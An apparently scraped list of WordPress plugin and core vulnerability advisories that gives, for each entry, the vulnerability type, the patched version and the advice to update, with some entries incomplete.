Plugin: Advanced Database Cleaner

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: Contact Form Multi by BestWebSoft – Multiple Forms Plugin for Single WordPress Website

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Theme Blvd Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WebLibrarian

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.8.7
Recommended Action: Update to version 3.4.8.7, or a newer patched version

Plugin: Visualizer: Tables and Charts Manager for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: 3.9.5
Recommended Action: Update to version 3.9.5, or a newer patched version

Plugin: Product Category Tree

Plugin: Youtube Freedown

Plugin: KiviCare – Clinic & Patient Management System (EHR)

Vulnerability: Missing Authorization
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.23
Recommended Action: Update to version 4.0.23, or a newer patched version

Plugin: QR code MeCard/vCard generator

Vulnerability: Missing Authorization via wqm_make_url_permanent
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Product Enquiry for WooCommerce, WooCommerce product catalog

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.2.13
Recommended Action: Update to version 2.2.13, or a newer patched version

Plugin: Anti-Spam: Spam Protection | Block Spam Users, Comments, Forms

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2023
Recommended Action: Update to version 2023, or a newer patched version

Core: WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting via Comments
Patched Version: 3.7.28
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.28, 3.8.28, 3.9.26, 4.0.25, 4.1.25, 4.2.22, 4.3.18, 4.4.17, 4.5.16, 4.6.13, 4.7.12, 4.8.8, 4.9.9, 5.0.1

Plugin: Magic Embeds

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: WooCommerce

Vulnerability: PHP Object Injection
Patched Version: 2.3.11
Recommended Action: Update to version 2.3.11, or a newer patched version

Plugin: User Access Manager

Vulnerability: IP Spoofing
Patched Version: 2.2.18
Recommended Action: Update to version 2.2.18, or a newer patched version

Plugin: Catalyst Connect Zoho CRM Client Portal

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Brave – Create Popup, Optins, Lead Generation, Survey, Sticky Elements & Interactive Content

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 0.6.3
Recommended Action: Update to version 0.6.3, or a newer patched version

Plugin: Image Map Pro – Drag-and-drop Builder for Interactive Images

Plugin: Download Manager Pro

Vulnerability: Unauthenticated Information Disclosure
Patched Version: 6.3.0
Recommended Action: Update to version 6.3.0, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.0.8
Recommended Action: Update to version 8.0.8, or a newer patched version

Plugin: Custom Product Tabs Lite for WooCommerce

Vulnerability: Authenticated (Store Manager+) Stored Cross-Site Scripting
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: WordPress Job Board and Recruitment Plugin – JobWP

Vulnerability: Arbitrary File Upload via ‘jobwp_upload_resume’
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Dynamic Widgets

Vulnerability: Refletced Cross-Site Scripting
Patched Version: 1.5.11
Recommended Action: Update to version 1.5.11, or a newer patched version

Plugin: Video Gallery – YouTube Gallery and Vimeo Gallery

Vulnerability: Authenticated (Admin+) Stored Cross Site Scripting
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: WooCommerce Amazon Pay

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Podlove Subscribe button

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Fluent Support – Helpdesk & Customer Support Ticket System

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: Export Post Info

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: WordPress Landing Pages

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Missing Authorization to Password Reset
Patched Version: 1.3.76
Recommended Action: Update to version 1.3.76, or a newer patched version

Plugin: Software License Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.4.8
Recommended Action: Update to version 4.4.8, or a newer patched version

Plugin: WP Ultimate Review

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Sticky Chat Widget: Chat Icons, Contact form, Email, SMS, Call Button, Click to Chat, Social Chat Widget, Sticky Chat Buttons

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: WSB Brands

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via $logo
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: JetSearch

Vulnerability: Missing Authorization
Patched Version: 3.1.2.1
Recommended Action: Update to version 3.1.2.1, or a newer patched version

Plugin: WP DS Blog Map

Plugin: All 404 Redirect to Homepage

Vulnerability: Reflected Cross-Site Scripting via tab Parameter
Patched Version: 1.21
Recommended Action: Update to version 1.21, or a newer patched version

Plugin: Wp-D3

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPSID Shortcode

Plugin: Gallery Images Ape

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Elementor Addon Elements

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: 1.12.8
Recommended Action: Update to version 1.12.8, or a newer patched version

Plugin: Dokan – Powerful WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.0.9
Recommended Action: Update to version 3.0.9, or a newer patched version

Plugin: ARMember Premium – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Privilege Escalation
Patched Version: 5.6
Recommended Action: Update to version 5.6, or a newer patched version

Plugin: WordPress Infinite Scroll – Ajax Load More

Vulnerability: Directory Traversal
Patched Version: 5.5.4
Recommended Action: Update to version 5.5.4, or a newer patched version

Plugin: Page View Count

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Quick Event Manager

Vulnerability: Authenticated(Admin+) Stored Cross-Site Scripting
Patched Version: 9.6.5
Recommended Action: Update to version 9.6.5, or a newer patched version

Plugin: Remove Schema

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 7.9.7
Recommended Action: Update to version 7.9.7, or a newer patched version

Plugin: Visual Form Builder

Vulnerability: Admin+ Cross-Site Scripting
Patched Version: 3.0.7
Recommended Action: Update to version 3.0.7, or a newer patched version

Plugin: Social Live Chat Helpdesk – MyAlice

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Bulk Order Form for WooCommerce

Vulnerability: Authenticated (Shop manager+) Stored Cross-Site Scripting
Patched Version: 3.6.0
Recommended Action: Update to version 3.6.0, or a newer patched version

Plugin: Jock On Air Now

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 5.6.2
Recommended Action: Update to version 5.6.2, or a newer patched version

Plugin: Login by Auth0

Vulnerability: 3.11.2
Patched Version: 3.11.3
Recommended Action: Update to version 3.11.3, or a newer patched version

Plugin: Simple Dropbox Upload

Vulnerability: Arbitrary File Upload
Patched Version: 1.8.8.1
Recommended Action: Update to version 1.8.8.1, or a newer patched version

Plugin: WP-EMail

Vulnerability: Spam Protection Bypass
Patched Version: 2.69.0
Recommended Action: Update to version 2.69.0, or a newer patched version

Plugin: eRoom – Zoom Meetings & Webinars

Vulnerability: Unauthorized Setting Update
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Authenticated SQL Injection
Patched Version: 2.9.55.2
Recommended Action: Update to version 2.9.55.2, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Cross-Site Scripting via wpf-dw-td-value class
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via mf_thankyou shortcode
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Jeeng Push Notifications

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Simple PDF Viewer

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via googlepdf Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Video Conferencing with Zoom

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.0.10
Recommended Action: Update to version 4.0.10, or a newer patched version

Plugin: Simple Fields

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.11
Recommended Action: Update to version 1.4.11, or a newer patched version

Plugin: ThreeWP Email Reflector

Vulnerability: Cross-Site Scripting
Patched Version: 1.16
Recommended Action: Update to version 1.16, or a newer patched version

Plugin: Site Notes

Vulnerability: Cross-Site Request Forgery to Admin Note Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Event Espresso – Event Registration & Ticketing Sales

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 4.10.12
Recommended Action: Update to version 4.10.12, or a newer patched version

Plugin: Spam protection, Anti-Spam, FireWall by CleanTalk

Vulnerability: Missing Authorization
Patched Version: 6.11
Recommended Action: Update to version 6.11, or a newer patched version

Plugin: Live Preview for Contact Form 7

Vulnerability: Missing Authorization via update_option
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Featured Image from URL (FIFU)

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: Twitget

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Missing Authorization
Patched Version: 8.1.17
Recommended Action: Update to version 8.1.17, or a newer patched version

Plugin: JS Help Desk – The Ultimate Help Desk & Support Plugin

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: PB SEO Friendly Images

Plugin: Limit Login Attempts Reloaded

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.17.4
Recommended Action: Update to version 2.17.4, or a newer patched version

Plugin: ark-commenteditor

Vulnerability: iframe Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Frontend File Manager Plugin

Vulnerability: Arbitrary File Upload
Patched Version: 3.6
Recommended Action: Update to version 3.6, or a newer patched version

Plugin: Active Directory Integration / LDAP Integration

Vulnerability: Unauthenticated Information Disclosure
Patched Version: 4.1.10
Recommended Action: Update to version 4.1.10, or a newer patched version

Plugin: SEO ALert

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Search Meter

Vulnerability: Remote Code Execution
Patched Version: 2.13.3
Recommended Action: Update to version 2.13.3, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.24
Recommended Action: Update to version 2.24, or a newer patched version

Plugin: Registration, User Profile, Membership, Content Restriction, User Directory, and Frontend Post Submission – WP User Frontend

Vulnerability: Arbitrary File Upload
Patched Version: 2.3.11
Recommended Action: Update to version 2.3.11, or a newer patched version

Plugin: WassUp Real Time Analytics

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.4.5
Recommended Action: Update to version 1.9.4.5, or a newer patched version

Plugin: Tagbox – UGC Galleries, Social Media Widgets, User Reviews & Analytics

Plugin: MainWP Child – Securely Connects to the MainWP Dashboard to Manage Multiple Sites

Vulnerability: SQL Injection via orderby, order Parameters
Patched Version: 4.1.8
Recommended Action: Update to version 4.1.8, or a newer patched version

Plugin: Melhor Envio

Vulnerability: Cross-Site Request Forgery and Authenticated Settings Change
Patched Version: 2.11.20
Recommended Action: Update to version 2.11.20, or a newer patched version

Plugin: Photo Feed

Vulnerability: Reflected Cross-Site Scripting via pf-gid
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ad Inserter – Ad Manager & AdSense Ads

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: All in One Social Lite

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Unauthenticated Reflected Cross-Site Scripting via ‘code’
Patched Version: 1.0.76
Recommended Action: Update to version 1.0.76, or a newer patched version

Plugin: Simple Giveaways – Grow your business, email lists and traffic with contests

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.36.2
Recommended Action: Update to version 2.36.2, or a newer patched version

Plugin: IFrame Admin Pages

Plugin: wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin

Vulnerability: SQL Injection
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: GN Publisher: Google News Compatible RSS Feeds

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Responsive Pricing Table

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 5.1.7
Recommended Action: Update to version 5.1.7, or a newer patched version

Plugin: WP Fusion Lite – Marketing Automation and CRM Integration for WordPress

Vulnerability: No subtitle
Patched Version: 3.37.30
Recommended Action: Update to version 3.37.30, or a newer patched version

Plugin: WP DB Error Manager

Plugin: Spam Free WordPress

Vulnerability: Full Path Disclosure
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.10.4
Recommended Action: Update to version 2.10.4, or a newer patched version

Plugin: FormBuilder

Vulnerability: SQL Injection
Patched Version: 1.08
Recommended Action: Update to version 1.08, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: WP Courses LMS – Online Courses Builder, eLearning Courses, Courses Solution, Education Courses

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Arbitrary Options Update
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: VikRentCar Car Rental Management System

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: WP Directory Kit

Vulnerability: Cross-Site Request Forgery to Plugin Settings Change/Delete, Demo Import, Directory Kit Modification/Deletion via admin_page_display
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 8.4.3
Recommended Action: Update to version 8.4.3, or a newer patched version

Plugin: Copy or Move Comments

Plugin: MapPress Maps for WordPress

Vulnerability: Insufficient Authorization to Information Disclosure
Patched Version: 2.88.16
Recommended Action: Update to version 2.88.16, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Directory Traversal
Patched Version: 1.7.15
Recommended Action: Update to version 1.7.15, or a newer patched version

Plugin: Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets & Elementor Templates)

Vulnerability: Local File Inclusion
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Aspose.PDF Exporter

Vulnerability: Arbitrary File Download
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Community by PeepSo – Download from PeepSo.com

Vulnerability: Cross-Site Request Forgery to Field Duplication
Patched Version: 6.1.0.0
Recommended Action: Update to version 6.1.0.0, or a newer patched version

Plugin: MobiLoud – WordPress Mobile Apps – Convert your WordPress Website to Native Mobile Apps

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: Secure File Manager

Vulnerability: Remote Code Execution
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: Software License Manager

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.5.0
Recommended Action: Update to version 4.5.0, or a newer patched version

Plugin: Social Proof Popups & Real-Time Notifications – Herd Effects

Vulnerability: No subtitle
Patched Version: 5.2.2
Recommended Action: Update to version 5.2.2, or a newer patched version

Plugin: Live Composer – Free WordPress Website Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.5.23
Recommended Action: Update to version 1.5.23, or a newer patched version

Plugin: bbPress Toolkit

Plugin: Easy Digital Downloads – Software Licensing

Vulnerability: Cross-Site Scripting
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: JWT Auth – WordPress JSON Web Token Authentication

Vulnerability: Algorithm Confusion
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Transposh WordPress Translation

Vulnerability: Unauthenticated Stored Cross-Site Scripting via ‘tp_translation’
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: Business Directory Plugin – Easy Listing Directories for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.3.11
Recommended Action: Update to version 6.3.11, or a newer patched version

Plugin: cformsII

Vulnerability: Cross-Site Scripting
Patched Version: 13.2
Recommended Action: Update to version 13.2, or a newer patched version

Plugin: ElasticPress

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.5.4
Recommended Action: Update to version 3.5.4, or a newer patched version

Plugin: Lana Text to Image

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Social Proof Popups & Real-Time Notifications – Herd Effects

Vulnerability: Local File Inclusion
Patched Version: 5.2.1
Recommended Action: Update to version 5.2.1, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Theme Names
Patched Version: 3.7.12
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.12, 3.8.12, 3.9.10, 4.0.9, 4.1.9, 4.2.6, 4.3.2, 4.4.1

Plugin: Special Text Boxes

Vulnerability: Cross-Site Scripting
Patched Version: 6.0.0
Recommended Action: Update to version 6.0.0, or a newer patched version

Plugin: Category Specific RSS feed Subscription

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: AdRotate Banner Manager – The only ad manager you'll need

Vulnerability: Admin+ SQL Injection
Patched Version: 5.8.22
Recommended Action: Update to version 5.8.22, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Arbitrary File Upload
Patched Version: 3.9.0
Recommended Action: Update to version 3.9.0, or a newer patched version

Plugin: Coming Soon Chop Chop

Plugin: Kudos Donations – Easy donations and payments with Mollie

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Core: WordPress MU

Vulnerability: Remote Code Execution
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: SeoSamba for WordPress Webmasters

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: WP Custom Admin Interface

Vulnerability: Missing Authorization via wpcai_pro_notice_disable
Patched Version: 7.32
Recommended Action: Update to version 7.32, or a newer patched version

Plugin: WooCommerce Per Product Shipping

Vulnerability: Missing Authorization
Patched Version: 2.5.5
Recommended Action: Update to version 2.5.5, or a newer patched version

Plugin: WooCommerce Easy Duplicate Product

Vulnerability: Reflected Cross-Site Scripting via wedp_duplicated
Patched Version: 0.3.0.1
Recommended Action: Update to version 0.3.0.1, or a newer patched version

Plugin: Cookieless Backend Server Tracking for Google Analytics – WordPress Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Customer Reviews for WooCommerce

Vulnerability: Multiple Unprotected AJAX Actions
Patched Version: 5.3.6
Recommended Action: Update to version 5.3.6, or a newer patched version

Plugin: Postman SMTP

Plugin: Social Feed | All social media in one place

Plugin: HT Event – WordPress Event Manager Plugin for Elementor

Vulnerability: Cross-Site Request Forgery leading to Arbitrary Plugin Activation
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: WP Job Manager

Vulnerability: Missing Authorization
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Media Library Assistant

Vulnerability: Information Disclosure
Patched Version: 3.01
Recommended Action: Update to version 3.01, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.6.9
Recommended Action: Update to version 1.6.9, or a newer patched version

Plugin: Auto Amazon Links – Amazon Associates Affiliate Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: Video List Manager

Plugin: WooCommerce Ship to Multiple Addresses

Vulnerability: Missing Authorization
Patched Version: 3.8.6
Recommended Action: Update to version 3.8.6, or a newer patched version

Plugin: FareHarbor for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.6.7
Recommended Action: Update to version 3.6.7, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery via ‘saveRedirectSettings’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WordPress form builder plugin for contact forms, surveys and quizzes – Tripetto

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: wp-noexternallinks

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.5.19
Recommended Action: Update to version 3.5.19, or a newer patched version

Plugin: O2tweet

Plugin: User Role by BestWebSoft – Add and Customize Roles and Capabilities in WordPress

Vulnerability: Cross-Site Request Forgery to Privilege Escalation
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: Image Hover Effects Ultimate (Image Gallery, Effects, Lightbox, Comparison or Magnifier)

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: 9.6.2
Recommended Action: Update to version 9.6.2, or a newer patched version

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.1.5
Recommended Action: Update to version 5.1.5, or a newer patched version

Plugin: Quick Contact Form

Vulnerability: Authenticated (Admin+) Stored Cross Site Scripting
Patched Version: 8.0.4
Recommended Action: Update to version 8.0.4, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Scripting
Patched Version: 2.9.94
Recommended Action: Update to version 2.9.94, or a newer patched version

Plugin: Portfolio for Elementor & Image Gallery | PowerFolio

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: HTML5 MP3 Player with Folder Feedburner Playlist Free

Plugin: WOLF – WordPress Posts Bulk Editor and Manager Professional

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.7.2
Recommended Action: Update to version 1.0.7.2, or a newer patched version

Plugin: Hotel Booking

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: CIP4 Folder Download Widget

Vulnerability: Local File Inclusion
Patched Version: 1.11
Recommended Action: Update to version 1.11, or a newer patched version

Plugin: filedownload

Vulnerability: Cross-Site Scripting
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: SocialGrid

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: SQL Injection
Patched Version: 1.5.35
Recommended Action: Update to version 1.5.35, or a newer patched version

Plugin: JS Multi Hotel

Plugin: Custom Content by Country (by Shield Security)

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: WPGlobus – Multilingual WordPress

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting via wpglobus_option[selector_wp_list_pages][show_selector]
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: wp-lytebox

Plugin: Book appointment online

Vulnerability: Cross-Site Scripting
Patched Version: 1.39
Recommended Action: Update to version 1.39, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Authenticated (or Cross-Site Request Forgery) Blind SQL Injection
Patched Version: 5.3.2
Recommended Action: Update to version 5.3.2, or a newer patched version

Plugin: AppMySite – Create an app with the Best Mobile App Builder

Vulnerability: Unauthenticated Information Disclsoure
Patched Version: 3.11.1
Recommended Action: Update to version 3.11.1, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: WP-EMail

Vulnerability: Cross-Site Request Forgery to Log Deletion
Patched Version: 2.69.0
Recommended Action: Update to version 2.69.0, or a newer patched version

Plugin: WP Zoho for Contact Form 7, WPForms, Elementor, Formidable and Ninja Forms – CRM, Bigin

Vulnerability: Cross-Site Request Forgery via settings_page function
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Social Media Icons Widget

Plugin: Recent Posts Slider

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Open Redirect
Patched Version: 3.8.2.3
Recommended Action: Update to version 3.8.2.3, or a newer patched version

Plugin: WP-Curriculo Vitae Free

Plugin: Simple SEO

Vulnerability: Cross-Site Request Forgery to Sitemap Deletion/Creation
Patched Version: 1.8.13
Recommended Action: Update to version 1.8.13, or a newer patched version

